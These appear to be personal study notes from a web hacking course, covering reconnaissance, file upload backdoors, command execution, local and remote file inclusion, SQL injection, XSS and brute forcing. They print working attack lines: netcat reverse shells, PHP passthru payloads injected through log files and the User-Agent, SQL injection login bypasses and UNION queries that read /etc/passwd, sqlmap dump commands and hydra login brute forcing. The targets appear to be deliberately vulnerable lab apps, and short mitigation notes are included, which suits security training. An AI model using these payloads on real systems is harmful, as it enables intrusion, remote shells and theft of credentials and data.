Website Hacking¶
Information Gathering¶
IP Address
Domain name info
Technologies used
Other websites on the same server
DNS records
Unlisted files, sub-domains, directories
Whois lookup - find info about owner of the target
Netcraft Site Report - shows technologies used on the target
Robtex DNS lookup - shows comprehensive info about the target website
Websites on the Same Server¶
One server can server a number of websites
Gaining access to one can help gain access to others
To find websites on the same server:
Use robtex DNS lookup under “names pointing to the same IP”
Using bing.com, search for ip:[target ip]
Discovering Subdomains¶
Knock can be used to find subdomains of target
Discover more information
Discover new web applications
Increase attack surface
Discover managemment areas
Beta / experimental features
knockpy google.com
Files and Directories¶
Find files and directories in target webasite
a tool called dirb
dirb [target] [wordlist] [options]
Exploitation¶
File Upload Vulnerabilities¶
Simple type of vulnerabilities
llow users to upload dexecutable files such as php
Upload a php shell or backdoor, ex: weevly
Generate backdoor: weevly generate [password] [filename]
Upload generated file
Connect to it: weevly [url to file] [password]
Find out how to use weevly help
Code Execution Vulnerabilities¶
If theres a command execution box or something
Allows an attacker to execute OS commands
Windows or linux commands
Can be used to get a reverse shell
Or upoad any file using wget command
Code execution commands attached in the resources
# Listen on your machiine on port 8080
nc -vv -l -p 8080
# The ip address of your machine for reverse connection - this will connect from the remote machine to your machine
nc -e /bin/sh 10.20.14.203 8080
Local File Inclusion¶
If theres a URL like this: ?page=include.php
Allow an attacher read any file on the same server
Access files outside www directory
Shell from LFI
Try to inject code into readable files
Example:
/prod/self/environ
# with burp suite modify the user-agent with:
<?passthru("nc -e /bin/sh 10.20.14.208 8888");?>
* /var/log/auth.log
# encode this with base64
ssh "<?passthru('nc -e /bin/sh 10.20.14.208 8888');?>"@10.20.14.210
# encode with burpsuite like this:
ssh "<?passthru(base64_decode('dkfhewkhohwkeff'));?>"@10.20.14.210
* /var/log/apache2/access.log
Remote File Inclusion¶
If theres a URL like this: ?page=include.php, put in /?page=http://10.20.14.203/reverse.txt
Similar to local file inclusion
But allows attacher to read any file from any server
Execute php files from other servers on the current server
Store php files on other servers as .txt
/etc/php5/cgi/php.ini
allow_url_fopen = on
allow_url_include = on
<?php
// save this as a txt file - it must be a webserver which kali has
passhru("nc -e /bin/sh 10.20.14.203 8080")
?>
Mitigation¶
File Upload Vulns - only allow safe files to be uploaded
Code Execution Vulns
Dont use dangerous functions
Filter use input before execution
File inclusion
Disable allow_url_fopen and allow_url_include
Use static file inclusion
SQL Injection¶
They are everywhere
Give access to the database - sensitive data
Can be used to read local files outside www root
Can be used to log in as admin and further exploit system
Can be used to upload files
Discovering SQLi in POST¶
Try to break the page
Using ‘and’, ‘order by’ or “’”
Test text boxes and url parameters on the form
# use a single quote when logging in to see the code
# use and 1=1
# and 1=0 to see if that works in the case of blind sql injection
# aNd 111=111
# OrDeR bY 1
# input your code like this in the password field:
123456' code here#
# bypass need for password in the password field
aaa' or 1=1 #
# bypass need for password in the username field
admin' #
# You can do the same with URLs if the UL has ?page=user-info.php&username=caleb
# you can inject ?page=user-info.php&username=caleb' order by 1#
# union select 1,table_name,null,null,5 from information_schema.tables where table_schema = 'owasp10'
# union select 1,column_name,null,null,5 from information_schema.columns where table_name = 'accounts'
# union select 1,username,password,is_admin,5 from accounts
# union select null,load_file('/etc/passwd'),null,null,null
# union select null,'example example',null,null,null into outfile '/var/www/mutillidae/example.txt'
# uNiOn/**/sElEcT/**/1,2/**/%23
Exploitation¶
SQLMap was designed to exploit sql injections
Works with many DB types, mysql, mssql, etc.
Can be used to perform everything we learned and more
sqlmap --help
# this is the full url including all the other stuff that comes after the url
sqlmap -u [target url]
# Get the dbs
sqlmap -u URL --dbs
# Current user, database, tables, columns, data
sqlmap -u URL --current-user
sqlmap -u URL --current-database
sqlmap -u URL --tables -D owasp10
sqlmap -u URL --columns -T accounts -D owasp10
sqlmap -u URL -T accounts -D owasp10 --dump
Preventing SQLi¶
Filters can be bypassed
Use black list of commands? Still can be bypassed
Use whitelist? Same issue
Use parameterized statments, seperate data from sql code
prepare("select * from accounts where username = ?")
execute (array('$admin' union select #'))
XSS Vulnerabilities¶
Allow an attacker to inject javascript code into the page
Code is executed when the page loads
Code is executed on the client machine not the server
Three main types 1. Persistent/stored XSS 2. Reflected XSS 3. DOM based XSS
Discovering XSS¶
Try to inject javascript code into the pages
Test text boxes and url parameters on the form
Reflected XSS¶
None persistent, not stored.
Only work if the target visits a specially crafted URL
http://target.com/page.php?something=<script>alert(“XSS”)</script>
<script>alert(“XSS”)</script>
Stored XSS¶
Persistent, stored on the page or DB
The injected code is executed every time the page is loaded
Exploiting XSS¶
Run any javascript code
Beef framework can be used to hook targets
Inject Beef hook in vulnerable pages
Execute code from beef
Preventing XSS Vulns¶
Minimise the usage of user input on html
Escape any untrusted input before inserting it into the page
Brute Force & Dictionary Attacks¶
Crunch can be used to create a wordlist
Syntax: crunch [min] [max] [characters] -t [pattern] -o [FileName]
example: crunch 6 8 123abc$ -i wordlist -t a@@@@b
Wordlists¶
Hydra¶
Hydra is a bruteforce tool that can be used to bruteforce almost any authentication service
Syntax: hydra [IP] -L [usernames] -P [passwords] [service]
Example: hydra 10.20.14.212 -l admin -P /root/wordlist.txt http-post-form “mutillidae/?paye=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:F=Not Logged In”
Discovering Vulnerabilities Automatically¶
Zed Attack Proxy ZAP¶
Automatically find vulnerabilities in web applications
free and easy to use
can also be used for manual testing
Pentest Methodology¶
Info Gathering
For every domain / subdomain
click on every link
for every link
test parameters